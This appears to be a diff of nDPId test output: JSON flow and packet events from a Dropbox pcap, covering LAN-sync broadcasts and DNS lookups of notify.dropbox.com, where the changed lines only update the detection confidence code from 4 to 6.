00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":824,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1459182817566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADf1cRAAEAR35DAqAFpwKgB\/0RcRFwAywVkeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":824,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182817566,"flow_last_seen":1459182817566,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":195,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1459182817566,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":825,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1459182817566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADf1cRAAEAR35DAqAFpwKgB\/0RcRFwAywVkeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"} 00706{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":826,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1459182817566,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":237,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":237,"pkt_l4_len":203,"thread_ts_msec":1459182817566,"pkt":"\/\/\/\/\/\/\/\/eJKcD6iOCABFAADf1cRAAEAR35DAqAFpwKgB\/0RcRFwAywVkeyJob3N0X2ludCI6IDI3NDM2MzU3MDAzNjkzNDgyMzM2MDM0MTQwOTA1MTg0MTU3MzU3OSwgInZlcnNpb24iOiBbMiwgMF0sICJkaXNwbGF5bmFtZSI6ICIiLCAicG9ydCI6IDE3NTAwLCAibmFtZXNwYWNlcyI6IFsyMDYwMzE0MCwgMTY3MTU2ODYsIDQ4NzQ1ODk1LCAxOTA3NjA0MCwgODc5NTY4MDQzLCAxMjM1MzUwMzAsIDE4MjE2NDkyMl19"} 00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":827,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182818229,"flow_last_seen":1459182818229,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182818229,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":827,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1459182818229,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1459182818229,"pkt":"8IQvSpdgeJKcD6iOCABFAABAQCRAAEARddHAqAFpwKgB\/oGlADUALERt3H0BAAABAAAAAAAABm5vdGlmeQdkcm9wYm94A2NvbQAAAQAB"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":827,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182818229,"flow_last_seen":1459182818229,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182818229,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"notify.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":827,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1459182818229,"flow_last_seen":1459182818229,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":0,"thread_ts_msec":1459182818229,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"notify.dropbox.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":828,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1459182818229,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1459182818229,"pkt":"8IQvSpdgeJKcD6iOCABFAABAQCRAAEARddHAqAFpwKgB\/oGlADUALERt3H0BAAABAAAAAAAABm5vdGlmeQdkcm9wYm94A2NvbQAAAQAB"} 00773{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":829,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1459182818263,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":294,"pkt_l4_len":260,"thread_ts_msec":1459182818263,"pkt":"eJKcD6iO8IQvSpdgCABFAAEYAABAAEARtR3AqAH+wKgBaQA1gaUBBH9u3H2BgAABAAEABAAEBm5vdGlmeQdkcm9wYm94A2NvbQAAAQABwAwAAQABAAAAcQAEon0Rg8AMAAIAAQAAAHEAFwducy0xMTU0CWF3c2Rucy0xNgNvcmcAwAwAAgABAAAAcQASBW5zLTgzCWF3c2Rucy0xMMAbwAwAAgABAAAAcQAWBm5zLTg5NQlhd3NkbnMtNDcDbmV0AMAMAAIAAQAAAHEAGQducy0xOTM2CWF3c2Rucy01MAJjbwJ1awDAYwABAAEAAVOfAATN+8BTwIEAAQABAAFTrgAEzfvDf8BAAAEAAQABU6sABM37xILAowABAAEAAVN1AATN+8eQ"} -00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":829,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182818229,"flow_last_seen":1459182818263,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1459182818263,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"notify.dropbox.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"162.125.17.131"}} +00797{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":829,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1459182818229,"flow_last_seen":1459182818263,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1459182818263,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"},"dns": {"query":"notify.dropbox.com","num_queries":1,"num_answers":9,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"162.125.17.131"}} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","packets-captured":837,"packets-processed":836,"total-skipped-flows":0,"total-l4-payload-len":52930,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":11,"total-detection-updates":6,"total-updates":0,"current-active-flows":7,"total-active-flows":11,"total-idle-flows":4,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":69,"global_ts_msec":1535391465534} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465534,"flow_last_seen":1535391465534,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1535391465534,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1535391465534,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADEWzxAAEARHT\/AqAEG\/\/\/\/\/0RcRFwAsAWteyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"} -00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465534,"flow_last_seen":1535391465534,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00648{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":837,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465534,"flow_last_seen":1535391465534,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391465534,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":838,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465535,"flow_last_seen":1535391465535,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":838,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1535391465535,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1535391465535,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADENtRAAEARfv\/AqAEGwKgB\/0RcRFwAsEMFeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":838,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465535,"flow_last_seen":1535391465535,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182798651,"flow_last_seen":1459182798820,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1459182817566,"flow_last_seen":1459182830673,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182798602,"flow_last_seen":1459182798781,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":606,"flow_avg_l4_payload_len":151,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182796665,"flow_last_seen":1459182796786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1459182817566,"flow_last_seen":1459182830673,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182818229,"flow_last_seen":1459182818263,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1459182816605,"flow_last_seen":1459182816645,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":1054,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":838,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1535391465535,"flow_last_seen":1535391465535,"flow_idle_time":200000,"flow_min_l4_payload_len":168,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":168,"flow_avg_l4_payload_len":168,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182798651,"flow_last_seen":1459182798820,"flow_idle_time":200000,"flow_min_l4_payload_len":31,"flow_max_l4_payload_len":281,"flow_tot_l4_payload_len":624,"flow_avg_l4_payload_len":156,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":50789,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00689{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1459182817566,"flow_last_seen":1459182830673,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182798602,"flow_last_seen":1459182798781,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":264,"flow_tot_l4_payload_len":606,"flow_avg_l4_payload_len":151,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":49112,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182796665,"flow_last_seen":1459182796786,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":654,"flow_avg_l4_payload_len":163,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":55407,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1459182817566,"flow_last_seen":1459182830673,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":195,"flow_tot_l4_payload_len":1170,"flow_avg_l4_payload_len":195,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1459182818229,"flow_last_seen":1459182818263,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":252,"flow_tot_l4_payload_len":576,"flow_avg_l4_payload_len":144,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":33189,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1459182816605,"flow_last_seen":1459182816645,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":1054,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1535391465535,"l3_proto":"ip4","src_ip":"192.168.1.105","dst_ip":"192.168.1.254","src_port":36173,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.Dropbox","breed":"Acceptable","category":"Cloud"}} 00674{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":839,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1535391495539,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1535391495539,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADEaV5AAEARDx3AqAEG\/\/\/\/\/0RcRFwAsAWteyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"} 00670{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":840,"source":"dropbox.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1535391495539,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":210,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":210,"pkt_l4_len":176,"thread_ts_msec":1535391495539,"pkt":"\/\/\/\/\/\/\/\/rNG4wD8JCABFAADEPR9AAEAReLTAqAEGwKgB\/0RcRFwAsEMFeyJ2ZXJzaW9uIjogWzIsIDBdLCAicG9ydCI6IDE3NTAwLCAiZGlzcGxheW5hbWUiOiAiIiwgImhvc3RfaW50IjogMTQyNjI0OTI5OTAwNTgxMDUzNDA3MzQwMDE2NzI1NzY2ODExMzI2LCAibmFtZXNwYWNlcyI6IFszMTE2NDIwNDE2LCAzMjA5MzgyOTQ0LCAxMjM1ODYyNywgMTEzODA0NDM2N119"} 